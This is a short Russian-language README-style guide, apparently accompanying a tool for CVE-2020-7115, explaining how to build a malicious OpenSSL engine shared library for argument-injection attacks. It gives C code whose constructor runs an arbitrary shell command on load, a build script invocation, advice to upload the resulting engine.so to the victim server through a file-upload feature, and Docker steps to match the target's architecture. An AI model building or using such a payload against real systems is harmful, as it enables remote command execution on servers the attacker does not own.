
Создайте свой вредоносный движок за секунды
Создайте свой вредоносный движок за секунды
Простой скрипт для генерации вредоносного движка, готового к использованию в сценариях внедрения аргументов в openssl.
Это очень просто, просто измените файл engine.c, указав команду по вашему выбору:
#include <unistd.h>
__attribute__((constructor))
static void init() {
execl("/bin/sh", "sh", "-c", "COMMAND");
}
После этого вам просто нужно запустить скрипт следующим образом:
bash build_engine.sh
Эта команда создаст папку с именем output, в которой вы найдете файл engine.so, который необходимо отправить на сервер через функцию загрузки файлов.
Важно знать, что вы должны создавать вредоносный движок с теми же характеристиками, что и у системы жертвы. То есть... если целевая система работает на 64-битном Linux, вы должны создавать вредоносный движок на 64-битном Linux.
Docker — это замечательная технология для таких вещей, и настройка среды очень проста.
Сначала загрузите образ docker с этого сайта для 64-битной системы Debian Linux:
sudo docker pull debian
Затем мы поднимем docker следующим образом:
sudo docker run -v `pwd`:/code -it debian
Давайте немного разберемся, что мы здесь сделали. Флаг -v используется для создания тома, в данном случае мы связываем содержимое папки /code с содержимым нашей текущей директории, отсюда и использование pwd.
Под связыванием я подразумеваю, что всё, что мы создаем или редактируем в /code (папка, расположенная в корне образа docker), будет отображаться в pwd и наоборот.
В нашем случае pwd указывает на следующую директорию на нашей локальной машине:
/home/retr0/CVE-2020-7115/
Флаг -it, с другой стороны, можно описать следующим образом:
Флаг -t (--tty) указывает Docker создать виртуальную терминальную сессию внутри контейнера. Обычно он используется с опцией -i (--interactive), которая оставляет STDIN открытым, даже если контейнер работает в detached mode.
Таким образом, использование флага -it полезно, когда мы хотим получить оболочку (shell) из данного контейнера.
Без проблем, просто посетите этот пост, и я уверен, вы полностью поймете эту уязвимость.